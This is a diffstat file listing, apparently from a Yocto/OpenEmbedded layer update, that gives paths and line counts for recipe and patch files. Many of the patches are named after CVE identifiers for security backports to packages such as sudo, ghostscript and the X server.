-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch37
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch238
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch65
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-28879.patch54
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-1.patch145
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-2.patch60
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-36664-pre1.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/CVE-2023-43115.patch62
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch51
-rw-r--r--meta/recipes-extended/ghostscript/ghostscript_9.52.bb18
-rw-r--r--meta/recipes-extended/go-examples/go-helloworld_0.1.bb2
-rw-r--r--meta/recipes-extended/grep/grep_3.4.bb1
-rw-r--r--meta/recipes-extended/groff/files/0001-Include-config.h.patch1026
-rw-r--r--meta/recipes-extended/groff/groff_1.22.4.bb16
-rw-r--r--meta/recipes-extended/gzip/gzip-1.10/CVE-2022-1271.patch45
-rw-r--r--meta/recipes-extended/gzip/gzip_1.10.bb1
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-make-update-neighbours-work-again.patch79
-rw-r--r--meta/recipes-extended/iputils/iputils/0001-arping-revert-partially-fix-sent-vs-received-package.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0002-arping-fix-f-quit-on-first-reply-regression.patch39
-rw-r--r--meta/recipes-extended/iputils/iputils/0003-arping-Fix-comparison-of-different-signedness-warnin.patch37
-rw-r--r--meta/recipes-extended/iputils/iputils/0004-arping-return-success-when-unsolicited-ARP-mode-dest.patch45
-rw-r--r--meta/recipes-extended/iputils/iputils/0005-arping-use-additional-timerfd-to-control-when-timeou.patch94
-rw-r--r--meta/recipes-extended/iputils/iputils_s20190709.bb8
-rw-r--r--meta/recipes-extended/less/less/CVE-2022-48624.patch41
-rw-r--r--meta/recipes-extended/less/less_551.bb1
-rw-r--r--meta/recipes-extended/libaio/libaio_0.3.111.bb2
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch183
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch23
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch172
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch321
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch121
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch93
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch29
-rw-r--r--meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch43
-rw-r--r--meta/recipes-extended/libarchive/libarchive_3.4.2.bb14
-rw-r--r--meta/recipes-extended/libnsl/libnsl2_git.bb2
-rw-r--r--meta/recipes-extended/libnss-nis/libnss-nis.bb6
-rw-r--r--meta/recipes-extended/libsolv/files/CVE-2021-3200.patch82
-rw-r--r--meta/recipes-extended/libsolv/libsolv_0.7.10.bb4
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc/CVE-2021-46828.patch155
-rw-r--r--meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb6
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch10
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch224
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch100
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch35
-rw-r--r--meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb4
-rw-r--r--meta/recipes-extended/logrotate/logrotate_3.15.1.bb6
-rw-r--r--meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch27
-rw-r--r--meta/recipes-extended/lsb/lsb-release_1.4.bb1
-rw-r--r--meta/recipes-extended/lsof/lsof_4.91.bb2
-rw-r--r--meta/recipes-extended/ltp/ltp_20200120.bb2
-rw-r--r--meta/recipes-extended/lzip/lzip_1.21.bb1
-rw-r--r--meta/recipes-extended/man-db/man-db_2.9.0.bb7
-rw-r--r--meta/recipes-extended/mc/mc_4.8.23.bb1
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28736.patch77
-rw-r--r--meta/recipes-extended/mdadm/files/CVE-2023-28938.patch80
-rw-r--r--meta/recipes-extended/mdadm/mdadm_4.1.bb3
-rw-r--r--meta/recipes-extended/mingetty/mingetty_1.08.bb1
-rw-r--r--meta/recipes-extended/minicom/minicom_2.7.1.bb2
-rw-r--r--meta/recipes-extended/newt/libnewt_0.52.21.bb2
-rw-r--r--meta/recipes-extended/pam/libpam/CVE-2024-22365.patch59
-rw-r--r--meta/recipes-extended/pam/libpam_1.3.1.bb1
-rw-r--r--meta/recipes-extended/parted/parted_3.3.bb3
-rw-r--r--meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb2
-rw-r--r--meta/recipes-extended/perl/libtimedate-perl_2.30.bb1
-rw-r--r--meta/recipes-extended/procps/procps/CVE-2023-4016.patch85
-rw-r--r--meta/recipes-extended/procps/procps_3.3.16.bb3
-rw-r--r--meta/recipes-extended/psmisc/psmisc_23.3.bb2
-rw-r--r--meta/recipes-extended/quota/quota_4.05.bb1
-rw-r--r--meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb2
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2021-26937.patch68
-rw-r--r--meta/recipes-extended/screen/screen/CVE-2023-24626.patch40
-rw-r--r--meta/recipes-extended/screen/screen_4.8.0.bb2
-rw-r--r--meta/recipes-extended/sed/sed_4.8.bb1
-rw-r--r--meta/recipes-extended/shadow/files/0001-Overhaul-valid_field.patch66
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-29383.patch54
-rw-r--r--meta/recipes-extended/shadow/files/CVE-2023-4641.patch146
-rw-r--r--meta/recipes-extended/shadow/shadow-sysroot_4.6.bb2
-rw-r--r--meta/recipes-extended/shadow/shadow.inc6
-rw-r--r--meta/recipes-extended/shadow/shadow_4.8.1.bb5
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch26
-rw-r--r--meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb7
-rw-r--r--meta/recipes-extended/sudo/files/CVE-2023-22809.patch113
-rw-r--r--meta/recipes-extended/sudo/sudo.inc6
-rw-r--r--meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch29
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch59
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch646
-rw-r--r--meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch26
-rw-r--r--meta/recipes-extended/sudo/sudo_1.8.32.bb (renamed from meta/recipes-extended/sudo/sudo_1.8.31.bb)9
-rw-r--r--meta/recipes-extended/sysklogd/sysklogd.inc2
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch92
-rw-r--r--meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch46
-rw-r--r--meta/recipes-extended/sysstat/sysstat_12.2.1.bb5
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2021-20193.patch133
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2022-48303.patch43
-rw-r--r--meta/recipes-extended/tar/tar/CVE-2023-39804.patch64
-rw-r--r--meta/recipes-extended/tar/tar_1.32.bb9
-rw-r--r--meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb1
-rw-r--r--meta/recipes-extended/timezone/timezone.inc8
-rw-r--r--meta/recipes-extended/timezone/tzdata.bb10
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch67
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch39
-rw-r--r--meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch33
-rw-r--r--meta/recipes-extended/unzip/unzip_6.0.bb7
-rw-r--r--meta/recipes-extended/watchdog/watchdog_5.15.bb5
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch58
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch165
-rw-r--r--meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb2
-rw-r--r--meta/recipes-extended/xinetd/xinetd_2.3.15.bb3
-rw-r--r--meta/recipes-extended/xz/xz/CVE-2022-1271.patch96
-rw-r--r--meta/recipes-extended/xz/xz_5.2.4.bb5
-rw-r--r--meta/recipes-extended/zip/zip_3.0.bb7
-rw-r--r--meta/recipes-gnome/epiphany/epiphany_3.34.4.bb4
-rw-r--r--meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch46
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2020-29385.patch55
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-20240.patch40
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf/CVE-2021-46829.patch61
-rw-r--r--meta/recipes-gnome/gdk-pixbuf/gdk-pixbuf_2.40.0.bb3
-rw-r--r--meta/recipes-gnome/gnome/adwaita-icon-theme_3.34.3.bb2
-rw-r--r--meta/recipes-gnome/gobject-introspection/gobject-introspection_1.62.0.bb2
-rw-r--r--meta/recipes-gnome/libnotify/libnotify_0.7.8.bb7
-rw-r--r--meta/recipes-gnome/librsvg/librsvg_2.40.21.bb3
-rw-r--r--meta/recipes-gnome/libsecret/libsecret_0.20.1.bb1
-rw-r--r--meta/recipes-graphics/builder/builder_0.1.bb2
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6461.patch21
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2019-6462.patch46
-rw-r--r--meta/recipes-graphics/cairo/cairo/CVE-2020-35492.patch60
-rw-r--r--meta/recipes-graphics/cairo/cairo_1.16.0.bb1
-rw-r--r--meta/recipes-graphics/clutter/clutter-gst-3.0.inc4
-rw-r--r--meta/recipes-graphics/clutter/clutter-gtk-1.0.inc5
-rw-r--r--meta/recipes-graphics/freetype/freetype/0001-sfnt-Fix-heap-buffer-overflow-59308.patch3
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27404.patch33
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27405.patch38
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2022-27406.patch31
-rw-r--r--meta/recipes-graphics/freetype/freetype/CVE-2023-2004.patch40
-rw-r--r--meta/recipes-graphics/freetype/freetype_2.10.1.bb4
-rw-r--r--meta/recipes-graphics/glew/glew/0001-Fix-build-race-in-Makefile.patch56
-rw-r--r--meta/recipes-graphics/glew/glew/notempdir.patch19
-rw-r--r--meta/recipes-graphics/glew/glew_2.2.0.bb2
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre0.patch335
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193-pre1.patch135
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz/CVE-2023-25193.patch179
-rw-r--r--meta/recipes-graphics/harfbuzz/harfbuzz_2.6.4.bb5
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-1.patch457
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2020-35538-2.patch400
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch133
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch97
-rw-r--r--meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch75
-rw-r--r--meta/recipes-graphics/jpeg/libjpeg-turbo_2.0.4.bb5
-rw-r--r--meta/recipes-graphics/kmscube/kmscube_git.bb6
-rw-r--r--meta/recipes-graphics/libfakekey/libfakekey_git.bb2
-rw-r--r--meta/recipes-graphics/libmatchbox/libmatchbox_1.12.bb2
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2020-14409-14410.patch79
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2021-33657.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2/CVE-2022-4743.patch38
-rw-r--r--meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb5
-rw-r--r--meta/recipes-graphics/libva/libva-utils_2.6.0.bb2
-rw-r--r--meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb2
-rw-r--r--meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch15
-rw-r--r--meta/recipes-graphics/mesa/mesa.inc7
-rw-r--r--meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb1
-rw-r--r--meta/recipes-graphics/mx/mx-1.0_1.4.7.bb2
-rw-r--r--meta/recipes-graphics/mx/mx.inc6
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch27
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch31
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch44
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch28
-rw-r--r--meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch30
-rw-r--r--meta/recipes-graphics/piglit/piglit_git.bb14
-rw-r--r--meta/recipes-graphics/startup-notification/startup-notification_0.12.bb5
-rw-r--r--meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb1
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch100
-rw-r--r--meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb3
-rw-r--r--meta/recipes-graphics/vulkan/assimp_5.0.1.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-demos_git.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb6
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb2
-rw-r--r--meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb3
-rw-r--r--meta/recipes-graphics/waffle/waffle_1.6.0.bb18
-rw-r--r--meta/recipes-graphics/wayland/libinput/CVE-2022-1215.patch360
-rw-r--r--meta/recipes-graphics/wayland/libinput_1.15.2.bb1
-rw-r--r--meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch111
-rw-r--r--meta/recipes-graphics/wayland/wayland_1.18.0.bb1
-rw-r--r--meta/recipes-graphics/wayland/weston-init/weston.ini2
-rw-r--r--meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch32
-rw-r--r--meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch57
-rw-r--r--meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch99
-rw-r--r--meta/recipes-graphics/wayland/weston_8.0.0.bb5
-rw-r--r--meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb3
-rw-r--r--meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb2
-rw-r--r--meta/recipes-graphics/xorg-font/xorg-minimal-fonts.bb6
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2021-31535.patch333
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3554.patch58
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2022-3555.patch38
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-3138.patch111
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43785.patch63
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch42
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch46
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch52
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch64
-rw-r--r--meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb9
-rw-r--r--meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb (renamed from meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb)7
-rw-r--r--meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb2
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch34
-rw-r--r--meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb1
-rw-r--r--meta/recipes-graphics/xorg-lib/xorg-lib-common.inc3
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg.inc14
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch36
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch70
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch40
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch39
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch86
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46342.patch78
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46343.patch51
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46344.patch75
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-0494.patch38
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-1393.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5367.patch84
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch102
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch79
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch63
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch55
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch87
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch221
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch41
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch45
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch64
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch46
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch113
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-1.patch74
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch57
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch49
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch47
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb61
-rw-r--r--meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb38
-rw-r--r--meta/recipes-kernel/blktrace/blktrace_git.bb7
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb3
-rw-r--r--meta/recipes-kernel/cryptodev/cryptodev.inc7
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch49
-rw-r--r--meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch42
-rw-r--r--meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch32
-rw-r--r--meta/recipes-kernel/dtc/dtc.inc4
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch36
-rw-r--r--meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch35
-rw-r--r--meta/recipes-kernel/dtc/dtc_1.6.0.bb2
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate20
-rw-r--r--meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb17
-rw-r--r--meta/recipes-kernel/kern-tools/kern-tools-native_git.bb6
-rw-r--r--meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb3
-rw-r--r--meta/recipes-kernel/kmod/kmod.inc3
-rw-r--r--meta/recipes-kernel/kmod/kmod/ptest.patch25
-rw-r--r--meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb (renamed from meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb)227
-rw-r--r--meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc2
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion.inc13
-rw-r--r--meta/recipes-kernel/linux/cve-exclusion_5.4.inc9445
-rwxr-xr-xmeta/recipes-kernel/linux/generate-cve-exclusions.py101
-rw-r--r--meta/recipes-kernel/linux/kernel-devsrc.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-dummy.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-dev.bb2
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-rt_5.4.bb6
-rw-r--r--meta/recipes-kernel/linux/linux-yocto-tiny_5.4.bb8
-rw-r--r--meta/recipes-kernel/linux/linux-yocto.inc4
-rw-r--r--meta/recipes-kernel/linux/linux-yocto_5.4.bb23
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0017-fix-random-remove-unused-tracepoints-v5.18.patch46
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0018-fix-random-remove-unused-tracepoints-v5.10-v5.15.patch45
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/0019-fix-random-tracepoints-removed-in-stable-kernels.patch51
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules/fix-jbd2-use-the-correct-print-format.patch147
-rw-r--r--meta/recipes-kernel/lttng/lttng-modules_2.11.9.bb (renamed from meta/recipes-kernel/lttng/lttng-modules_2.11.6.bb)13
-rw-r--r--meta/recipes-kernel/lttng/lttng-tools_2.11.5.bb3
-rw-r--r--meta/recipes-kernel/make-mod-scripts/make-mod-scripts_1.0.bb5
-rwxr-xr-xmeta/recipes-kernel/modutils-initscripts/files/modutils.sh2
-rw-r--r--meta/recipes-kernel/perf/perf.bb10
-rw-r--r--meta/recipes-kernel/powertop/powertop/0002-configure.ac-ax_add_fortify_source.patch70
-rw-r--r--meta/recipes-kernel/powertop/powertop/0003-configure-Use-AX_REQUIRE_DEFINED.patch29
-rw-r--r--meta/recipes-kernel/powertop/powertop_2.10.bb10
-rw-r--r--meta/recipes-kernel/systemtap/systemtap-uprobes_git.bb2
-rw-r--r--meta/recipes-kernel/systemtap/systemtap/0001-gcc12-c-compatibility-re-tweak-for-rhel6-use-functio.patch49
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.bb7
-rw-r--r--meta/recipes-kernel/systemtap/systemtap_git.inc2
-rw-r--r--meta/recipes-kernel/wireless-regdb/wireless-regdb_2024.01.23.bb (renamed from meta/recipes-kernel/wireless-regdb/wireless-regdb_2020.04.29.bb)4
-rw-r--r--meta/recipes-multimedia/alsa/alsa-lib_1.2.1.2.bb2
-rw-r--r--meta/recipes-multimedia/alsa/alsa-plugins_1.2.1.bb5
-rw-r--r--meta/recipes-multimedia/alsa/alsa-tools_1.1.7.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-topology-conf_1.2.1.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-ucm-conf_1.2.1.2.bb3
-rw-r--r--meta/recipes-multimedia/alsa/alsa-utils_1.2.1.bb2
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/0001-libavutil-include-assembly-with-full-path-from-sourc.patch97
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-3566.patch61
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2021-38291.patch53
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-1475.patch36
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3109.patch41
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-3341.patch67
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg/CVE-2022-48434.patch136
-rw-r--r--meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb14
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2020-22219.patch197
-rw-r--r--meta/recipes-multimedia/flac/files/CVE-2021-0561.patch34
-rw-r--r--meta/recipes-multimedia/flac/flac_1.3.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb5
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch36
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb6
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch207
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3498.patch44
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1920.patch59
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1921.patch69
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-1922-1923-1924-1925.patch214
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2022-2122.patch60
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good_1.16.3.bb14
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-ugly_1.16.3.bb4
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-python_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-rtsp-server_1.16.3.bb2
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0-vaapi_1.16.3.bb1
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0/0006-tests-seek-Don-t-use-too-strict-timeout-for-validati.patch33
-rw-r--r--meta/recipes-multimedia/gstreamer/gstreamer1.0_1.16.3.bb19
-rw-r--r--meta/recipes-multimedia/lame/lame_3.100.bb3
-rw-r--r--meta/recipes-multimedia/liba52/liba52_0.7.4.bb3
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag/cflags_filter.patch21
-rw-r--r--meta/recipes-multimedia/libid3tag/libid3tag_0.15.1b.bb1
-rw-r--r--meta/recipes-multimedia/libomxil/libomxil_0.9.3.bb6
-rw-r--r--meta/recipes-multimedia/libpng/files/run-ptest29
-rw-r--r--meta/recipes-multimedia/libpng/libpng_1.6.37.bb18
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0/shared_version_info.patch13
-rw-r--r--meta/recipes-multimedia/libsamplerate/libsamplerate0_0.1.9.bb2
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_1.patch36
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-3246_2.patch44
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2021-4156.patch30
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1/CVE-2022-33065.patch46
-rw-r--r--meta/recipes-multimedia/libsndfile/libsndfile1_1.0.28.bb9
